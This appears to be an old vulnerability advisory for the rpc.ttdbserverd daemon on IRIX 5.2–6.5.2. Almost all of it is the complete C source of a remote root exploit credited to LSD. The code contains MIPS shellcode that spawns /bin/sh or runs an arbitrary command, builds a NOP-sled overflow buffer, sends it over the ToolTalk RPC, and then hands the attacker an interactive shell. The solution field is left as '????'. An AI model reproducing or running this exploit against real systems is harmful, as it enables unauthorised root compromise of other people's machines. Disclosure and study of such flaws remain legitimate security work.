COMMAND
rpc.ttdbserverd
SYSTEMS AFFECTED
IRIX 5.2, 5.3, 6.2, 6.3, 6.4, 6.5, 6.5.2
PROBLEM
There exists a buffer overflow vulnerability in the
rpc.ttdbserverd daemon, which when appropriately exploited can
lead to a remote root compromise on a vulnerable system. Good
link for this program will find at:
http://oliver.efri.hr/~crv/security/bugs/mUNIXes/tooltalk.html
Code by LSD:
/*## copyright LAST STAGE OF DELIRIUM jul 1998 poland *://lsd-pl.net/ #*/
/*## rpc.ttdbserverd #*/
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <rpc/rpc.h>
#include <netdb.h>
#include <stdio.h>
#include <errno.h>
#define ADRNUM 2000
#define NOPNUM 18000
#define TTDBSERVERD_PROG 100083
#define TTDBSERVERD_VERS 1
#define TTDBSERVERD_ISERASE 7
char findsckcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<findsckcode> */
"\x24\x10\x01\x90" /* li $s0,400 */
"\x22\x11\xff\xb0" /* addi $s1,$s0,-80 */
"\x22\x12\xff\xac" /* addi $s2,$s0,-84 */
"\x22\x0d\xfe\x98" /* addi $t5,$s0,-360 */
"\x03\xed\x68\x20" /* add $t5,$ra,$t5 */
"\x01\xa0\xf0\x09" /* jalr $s8,$t5 */
"\x8f\xeb\xff\xc0" /* lw $t3,-64($ra) */
"\x31\x6b\xff\xff" /* andi $t3,$t3,0xffff */
"\x21\x6b\x00\x00" /* addi $t3,$t3,0 */
"\x22\x0d\xfe\xc0" /* addi $t5,$s0,-320 */
"\x11\x60\xff\xf9" /* beqz $t3,<findsckcode+20> */
"\x22\x24\xfe\xd4" /* addi $a0,$s1,-300 */
"\x23\xe5\xff\xc0" /* addi $a1,$ra,-64 */
"\x23\xe6\xff\xbc" /* addi $a2,$ra,-68 */
"\xaf\xf2\xff\xbc" /* sw $s2,-68($ra) */
"\x24\x02\x04\x45" /* li $v0,1093 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x31\xff\xff" /* addi $s1,$s1,-1 */
"\x10\xe0\xff\xf3" /* beqz $a3,<findsckcode+28> */
"\x22\x2b\xfe\xd4" /* addi $t3,$s1,-300 */
"\x1d\x60\xff\xf6" /* bgzt $t3,<findsckcode+48> */
"\x22\x04\xfe\x72" /* addi $a0,$s0,-398 */
"\x24\x02\x03\xee" /* li $v0,1006 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x24\xfe\xd5" /* addi $a0,$s1,-299 */
"\x22\x05\xfe\x72" /* addi $a1,$s0,-398 */
"\x24\x02\x04\x11" /* li $v0,1041 */
"\x03\xff\xff\xcc" /* syscall */
"\x22\x10\xff\xff" /* addi $s0,$s0,-1 */
"\x22\x0b\xfe\x72" /* addi $t3,$s0,-398 */
"\x05\x61\xff\xf6" /* bgez $t3,<findsckcode+88> */
;
char shellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<shellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x01\x14" /* addi $ra,$ra,276 */
"\x23\xe4\xff\x08" /* addi $a0,$ra,-248 */
"\x23\xe5\xff\x10" /* addi $a1,$ra,-220 */
"\xaf\xe4\xff\x10" /* sw $a0,-220($ra) */
"\xaf\xe0\xff\x14" /* sw $zero,-236($ra) */
"\xa3\xe0\xff\x0f" /* sb $zero,-241($ra) */
"\x03\xff\xff\xcc" /* syscall */
"/bin/sh"
;
char cmdshellcode[]=
"\x04\x10\xff\xff" /* bltzal $zero,<cmdshellcode> */
"\x24\x02\x03\xf3" /* li $v0,1011 */
"\x23\xff\x08\xf4" /* addi $ra,$ra,2292 */
"\x23\xe4\xf7\x40" /* addi $a0,$ra,-2240 */
"\x23\xe5\xfb\x24" /* addi $a1,$ra,-1244 */
"\xaf\xe4\xfb\x24" /* sw $a0,-1244($ra) */
"\x23\xe6\xf7\x48" /* addi $a2,$ra,-2232 */
"\xaf\xe6\xfb\x28" /* sw $a2,-1240($ra) */
"\x23\xe6\xf7\x4c" /* addi $a2,$ra,-2228 */
"\xaf\xe6\xfb\x2c" /* sw $a2,-1236($ra) */
"\xaf\xe0\xfb\x30" /* sw $zero,-1232($ra) */
"\xa3\xe0\xf7\x47" /* sb $zero,-2233($ra) */
"\xa3\xe0\xf7\x4a" /* sb $zero,-2230($ra) */
"\x02\x04\x8d\x0c" /* syscall */
"\x01\x08\x40\x25" /* or $t0,$t0,$t0 */
"/bin/sh -c "
;
static char nop[]="\x24\x0f\x12\x34";
typedef struct{char *string;}req_t;
bool_t xdr_req(XDR *xdrs,req_t *obj){
if(!xdr_string(xdrs,&obj->string,~0)) return(FALSE);
return(TRUE);
}
main(int argc,char **argv){
char buffer[30000],address[4],*b,*cmd;
int i,c,n,flag=1,vers=6,port=0,sck;
CLIENT *cl;enum clnt_stat stat;
struct hostent *hp;
struct sockaddr_in adr;
struct timeval tm={10,0};
req_t req;
printf("copyright LAST STAGE OF DELIRIUM jul 1998 poland //lsd-pl.net/\n");
printf("rpc.ttdbserverd for irix 5.2 5.3 6.2 6.3 6.4 6.5 6.5.2 ");
printf("IP:17,19-22,25-28,30,32\n\n");
if(argc<2){
printf("usage: %s address [-s|-c command] [-p port] [-v 5]\n",argv[0]);
exit(-1);
}
while((c=getopt(argc-1,&argv[1],"sc:p:v:"))!=-1){
switch(c){
case 's': flag=1;break;
case 'c': flag=0;cmd=optarg;break;
case 'p': port=atoi(optarg);break;
case 'v': vers=atoi(optarg);
}
}
if(vers==5) *(unsigned long*)address=htonl(0x7fff24f4+2000+9000+32700);
else *(unsigned long*)address=htonl(0x7fff24f4+2000+9000);
printf("adr=0x%08x timeout=%d ",ntohl(*(unsigned long*)address),tm.tv_sec);
fflush(stdout);
adr.sin_family=AF_INET;
adr.sin_port=htons(port);
if((adr.sin_addr.s_addr=inet_addr(argv[1]))==-1){
if((hp=gethostbyname(argv[1]))==NULL){
errno=EADDRNOTAVAIL;perror("error");exit(-1);
}
memcpy(&adr.sin_addr.s_addr,hp->h_addr,4);
}
sck=RPC_ANYSOCK;
if(!(cl=clnttcp_create(&adr,TTDBSERVERD_PROG,TTDBSERVERD_VERS,&sck,0,0))){
clnt_pcreateerror("error");exit(-1);
}
b=buffer;
for(i=0;i<ADRNUM;i++) *b++=address[i%4];
for(i=0;i<NOPNUM;i++) *b++=nop[i%4];
if(flag){
i=sizeof(struct sockaddr_in);
if(getsockname(sck,(struct sockaddr*)&adr,&i)==-1){
struct netbuf {unsigned int maxlen;unsigned int len;char *buf;};
struct netbuf nb;
ioctl(sck,(('S'<<8)|2),"sockmod");
nb.maxlen=0xffff;
nb.len=sizeof(struct sockaddr_in);;
nb.buf=(char*)&adr;
ioctl(sck,(('T'<<8)|144),&nb);
}
n=-ntohs(adr.sin_port);
printf("port=%d connected! ",-n);fflush(stdout);
findsckcode[36+2]=(unsigned char)((n&0xff00)>>8);
findsckcode[36+3]=(unsigned char)(n&0xff);
for(i=0;i<strlen(findsckcode);i++) *b++=findsckcode[i];
for(i=0;i<4;i++) *b++=nop[i%4];
for(i=0;i<strlen(shellcode);i++) *b++=shellcode[i];
}else{
printf("connected! ");fflush(stdout);
for(i=0;i<strlen(cmdshellcode);i++) *b++=cmdshellcode[i];
for(i=0;i<4;i++) *b++=' ';
for(i=0;i<strlen(cmd);i++) *b++=cmd[i];
}
*b++=':';
*b=0;
req.string=buffer;
cl->cl_auth=authunix_create("localhost",0,0,0,NULL);
stat=clnt_call(cl,TTDBSERVERD_ISERASE,xdr_req,&req,xdr_void,NULL,tm);
printf("sent!\n");
if(!flag) exit(0);
write(sck,"/bin/uname -a\n",14);
while(1){
fd_set fds;
FD_ZERO(&fds);
FD_SET(0,&fds);
FD_SET(sck,&fds);
if(select(FD_SETSIZE,&fds,NULL,NULL,NULL)){
int cnt;
char buf[1024];
if(FD_ISSET(0,&fds)){
if((cnt=read(0,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(sck,buf,cnt);
}
if(FD_ISSET(sck,&fds)){
if((cnt=read(sck,buf,1024))<1){
if(errno==EWOULDBLOCK||errno==EAGAIN) continue;
else break;
}
write(1,buf,cnt);
}
}
}
}
SOLUTION
????